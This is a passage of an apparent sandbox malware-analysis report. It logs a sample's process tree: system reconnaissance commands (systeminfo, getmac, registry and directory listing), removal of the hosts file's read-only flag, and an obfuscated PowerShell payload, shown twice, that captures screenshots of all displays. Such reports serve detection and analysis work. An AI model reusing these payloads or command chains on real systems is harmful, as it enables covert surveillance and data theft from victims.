                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:72
                                                                                                                                                                                                                                      Start time:13:37:03
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:73
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:74
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:systeminfo
                                                                                                                                                                                                                                      Imagebase:0x7ff757dd0000
                                                                                                                                                                                                                                      File size:110'080 bytes
                                                                                                                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:75
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:76
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:77
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:78
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                      Imagebase:0x7ff76f8a0000
                                                                                                                                                                                                                                      File size:77'312 bytes
                                                                                                                                                                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:79
                                                                                                                                                                                                                                      Start time:13:37:04
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:80
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                                                                                                                                                                                                                                      Imagebase:0x7ff780b60000
                                                                                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:81
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:82
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:83
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:84
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff786950000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:85
                                                                                                                                                                                                                                      Start time:13:37:06
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
                                                                                                                                                                                                                                      Imagebase:0x7ff7ed980000
                                                                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:86
                                                                                                                                                                                                                                      Start time:13:37:07
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:87
                                                                                                                                                                                                                                      Start time:13:37:07
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:88
                                                                                                                                                                                                                                      Start time:13:37:07
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:getmac
                                                                                                                                                                                                                                      Imagebase:0x7ff715e50000
                                                                                                                                                                                                                                      File size:90'112 bytes
                                                                                                                                                                                                                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:89
                                                                                                                                                                                                                                      Start time:13:37:08
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:90
                                                                                                                                                                                                                                      Start time:13:37:08
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:91
                                                                                                                                                                                                                                      Start time:13:37:08
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:92
                                                                                                                                                                                                                                      Start time:13:37:08
                                                                                                                                                                                                                                      Start date:05/12/2024
